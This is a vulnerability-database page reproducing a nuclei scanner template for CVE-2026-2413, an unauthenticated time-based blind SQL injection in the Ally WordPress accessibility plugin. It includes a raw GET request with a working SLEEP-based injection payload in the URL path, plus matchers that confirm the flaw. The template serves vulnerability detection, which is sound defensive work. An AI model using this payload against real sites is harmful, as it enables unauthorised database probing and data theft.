Lucene search
K

Ally – Web Accessibility & Usability <= 4.0.3 - SQL Injection

🗓️ 05 Jul 2026 03:01:21Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 26 Views

Ally WordPress plugin up to 4.0.3 is vulnerable to unauthenticated SQL injection via the URL path in get_global_remediations; remediation module must be active.

Related
Refs
Code
id: CVE-2026-2413

info:
  name: Ally – Web Accessibility & Usability <= 4.0.3 - SQL Injection
  author: Shivam Kamboj
  severity: high
  description: |
    The Ally – Web Accessibility & Usability plugin for WordPress is vulnerable to SQL Injection via the URL path in all versions up to, and including, 4.0.3. This is due to insufficient escaping on the user-supplied URL parameter in the `get_global_remediations()` method, where it is directly concatenated into an SQL JOIN clause without proper sanitization for SQL context. While `esc_url_raw()` is applied for URL safety, it does not prevent SQL metacharacters (single quotes, parentheses) from being injected. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database via time-based blind SQL injection techniques. The Remediation module must be active, which requires the plugin to be connected to an Elementor account.
  impact: |
    Unauthenticated attackers can extract sensitive database information via blind SQL injection, risking data disclosure.
  remediation: |
    Update to a version later than 4.0.3 or the latest available version.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/pojo-accessibility/ally-web-accessibility-usability-403-unauthenticated-sql-injection-via-url-path
    - https://nvd.nist.gov/vuln/detail/CVE-2026-2413
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2026-2413
    epss-score: 0.02289
    epss-percentile: 0.81103
  metadata:
    max-request: 1
    verified: true
  tags: cve,cve2026,wordpress,wp,wp-plugin,sqli,pojo-accessibility,unauth

http:
  - raw:
      - |
        @timeout: 30s
        GET /x'OR(EXP(~(SELECT*FROM(SELECT(SLEEP(8)))a)))OR'/ HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36

    matchers:
      - type: dsl
        dsl:
          - 'duration>=8'
          - 'status_code==404 || status_code==200'
          - 'contains(body, "registerAllyAction")'
        condition: and
# digest: 4a0a00473045022100dffa3c8bec311dbb34085e353737baad5073468b8908b979f981f3980f4aede60220476f6b79b16c3947690c0211cb5a426f8948e69d59e3c89d63e7d719e448d7f3:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

11 Mar 2026 17:30Current
6.8Medium risk
Vulners AI Score6.8
CVSS 3.17.5
EPSS0.02289
SSVC
26